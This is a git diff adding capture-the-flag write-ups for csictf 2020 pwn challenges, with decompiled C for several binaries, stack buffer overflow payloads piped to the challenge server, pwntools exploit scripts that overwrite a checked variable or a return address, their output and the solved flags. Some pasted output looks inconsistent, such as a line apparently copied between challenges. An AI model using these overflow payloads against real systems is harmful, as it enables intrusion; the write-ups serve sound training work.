Added Pwn Challenges

Pwn/Global Warming/README.md

@@ -0,0 +1,10 @@
+## Global Warming
+The main idea finding the flag is `%n` exploit.
+
+#### Step-1:
+
+https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md
+
+#### Step-5:
+Finally the flag becomes:
+`csictf{n0_5tr1ng5_@tt@ch3d}`

Pwn/Secret Society/README.md

@@ -0,0 +1,84 @@
+## Secret Society
+The main idea finding the flag is Buffer Overflow.
+
+#### Step-1:
+After I downloaded `secret-society`, I reversed it with IDA, I got this source code:
+
+**main()** function:
+```c
+undefined8 main(void)
+{
+  size_t sVar1;
+  undefined8 local_d8 [2];
+  undefined4 uStack200;
+  undefined auStack196 [108];
+  char local_58 [56];
+  FILE *local_20;
+  char *local_18;
+  __gid_t local_c;
+  
+  setvbuf(stdout,(char *)0x0,2,0);
+  local_c = getegid();
+  setresgid(local_c,local_c,local_c);
+  memset(local_58,0,0x32);
+  memset(local_d8,0,0x80);
+  puts("What is the secret phrase?");
+  fgets((char *)local_d8,0x80,stdin);
+  local_18 = strchr((char *)local_d8,10);
+  if (local_18 != (char *)0x0) {
+    *local_18 = '\0';
+  }
+  sVar1 = strlen((char *)local_d8);
+  *(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c;
+  *(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520;
+  *(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265;
+  auStack196[sVar1] = 0;
+  local_20 = fopen("flag.txt","r");
+  if (local_20 == (FILE *)0x0) {
+    printf("You are a double agent, it\'s game over for you.");
+                    /* WARNING: Subroutine does not return */
+    exit(0);
+  }
+  fgets(local_58,0x32,local_20);
+  printf("Shhh... don\'t tell anyone else about ");
+  puts((char *)local_d8);
+  return 0;
+}
+
+```
+
+#### Step-2:
+So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)`
+
+So I tried using Debugger to get the address of the flag.
+
+
+```bash
+echo flag > flag.txt
+perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society
+```
+
+I got this output: 
+
+```bash
+What is the secret phrase?
+Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag
+```
+
+#### Step-3:
+So, we just have to run this remotely on the web server.
+
+```bash
+perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041
+```
+I got this output: 
+
+```bash
+What is the secret phrase?
+Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy}
+```
+Voila! I got the flag there.
+
+#### Step-4:
+Finally the flag becomes:
+`csivit{Bu!!er_e3pl01ts_ar5_5asy}`

Pwn/Secret Society/flag.txt

@@ -0,0 +1 @@
+flag

Pwn/pwn intended 0x1/README.md

@@ -0,0 +1,53 @@
+## pwn intended 0x1
+The main idea finding the flag is Buffer Overflow.
+
+#### Step-1:
+I reversed the file with Ghidra.
+
+```c
+undefined8 main(void)
+
+{
+  char local_38 [44];
+  int local_c;
+
+  local_c = 0;
+  setbuf(stdout,(char *)0x0);
+  setbuf(stdin,(char *)0x0);
+  setbuf(stderr,(char *)0x0);
+  puts("Please pour me some coffee:");
+  gets(local_38);
+  puts("\nThanks!\n");
+  if (local_c != 0) {
+    puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
+    system("cat flag.txt");
+  }
+  return 0;
+}
+```
+
+#### Step-2:
+Clearly, this was a case for Buffer Overflow.
+
+A simple command to overflow the buffer would give us the flag.
+
+`python -c 'print"A"*45' | nc chall.csivit.com 30001`
+
+<i> The piping done other way round doesn't help though. </i>
+
+Output:
+
+```bash
+Please pour me some coffee:
+
+Thanks!
+
+Oh no, you spilled some coffee on the floor! Use the flag to clean it.
+csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
+```
+
+Voila! There we have our flag.
+
+#### Step-3:
+Finally the flag becomes:
+`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}`

Pwn/pwn intended 0x2/README.md

@@ -0,0 +1,63 @@
+## pwn-intended-0x2
+The main idea finding the flag is overwrite the correct hex after padding.
+
+#### Step-1:
+After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code:
+
+```c
+undefined8 main(void)
+
+{
+  char local_38 [44];
+  int local_c;
+
+  local_c = 0;
+  setbuf(stdout,(char *)0x0);
+  setbuf(stdin,(char *)0x0);
+  setbuf(stderr,(char *)0x0);
+  puts("Welcome to csictf! Where are you headed?");
+  gets(local_38);
+  puts("Safe Journey!");
+  if (local_c == -0x35014542) {
+    puts("You\'ve reached your destination, here\'s a flag!");
+    system("/bin/cat flag.txt");
+  }
+  return 0;
+}
+```
+
+#### Step-2:
+`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes.
+
+#### Step-3:
+I wrote a very common `rev_exploit.py` to pwn into the machine.
+
+```python
+import pwn
+
+r = pwn.remote('chall.csivit.com', 30007)
+
+payload = "A"*44 + '\xbe\xba\xfe\xca'
+
+r.sendline(payload)
+r.interactive()
+```
+
+#### Step-4:
+When I finally ran this `python3 rev_exploit.py`, I got this output:
+
+```bash
+[+] Opening connection to chall.csivit.com on port 30007: Done
+[*] Switching to interactive mode
+Welcome to csictf! Where are you headed?
+Safe Journey!
+You've reached your destination, here's a flag!
+csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive 
+$
+[*] Interrupted
+```
+Voila! I got the flag there.
+
+#### Step-5:
+Finally the flag becomes:
+`csictf{c4n_y0u_re4lly_telep0rt?}`

Pwn/pwn intended 0x2/rev_exploit.py

@@ -0,0 +1,10 @@
+#!/usr/bin/env python3
+
+import pwn
+
+r = pwn.remote('chall.csivit.com', 30007)
+
+payload = "A"*44 + '\xbe\xba\xfe\xca'
+
+r.sendline(payload)
+r.interactive()

Pwn/pwn-intended-0x3/README.md

@@ -0,0 +1,76 @@
+## pwn-intended-0x3
+The main idea finding the flag is overwrite the correct hex after padding.
+
+#### Step-1:
+After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code:
+
+**main()** function:
+```c
+undefined8 main(void)
+
+{
+  char local_28 [32];
+
+  setbuf(stdout,(char *)0x0);
+  setbuf(stdin,(char *)0x0);
+  setbuf(stderr,(char *)0x0);
+  puts("Welcome to csictf! Time to teleport again.");
+  gets(local_28);
+  return 0;
+}
+```
+
+**flag()** function:
+```c
+void flag(void)
+
+{
+  puts("Well, that was quick. Here\'s your flag:");
+  system("cat flag.txt");
+                    /* WARNING: Subroutine does not return */
+  exit(0);
+}
+```
+
+#### Step-2:
+I just had to write the address of the flag function after 32+8 bytes.
+
+So I tried using Debugger to get the address of the flag.
+
+```bash
+echo into functions | gdb ./pwn-intended-0x3 | grep flag
+```
+I got this output: `0x00000000004011ce  flag`
+
+#### Step-3:
+I wrote a very common `rev_exploit.py` to pwn into the machine.
+
+```python
+import pwn
+
+r = pwn.remote('chall.csivit.com', 30013)
+
+payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00'
+
+r.sendline(payload)
+r.interactive()
+```
+
+#### Step-4:
+When I finally ran this `python3 rev_exploit.py`, I got this output:
+
+```bash
+[+] Opening connection to chall.csivit.com on port 30013: Done
+[*] Switching to interactive mode
+Welcome to csictf! Time to teleport again.
+Well, that was quick. Here's your flag:
+You've reached your destination, here's a flag!
+csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive 
+$
+[*] Interrupted
+```
+Voila! I got the flag there.
+
+#### Step-5:
+Finally the flag becomes:
+`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}`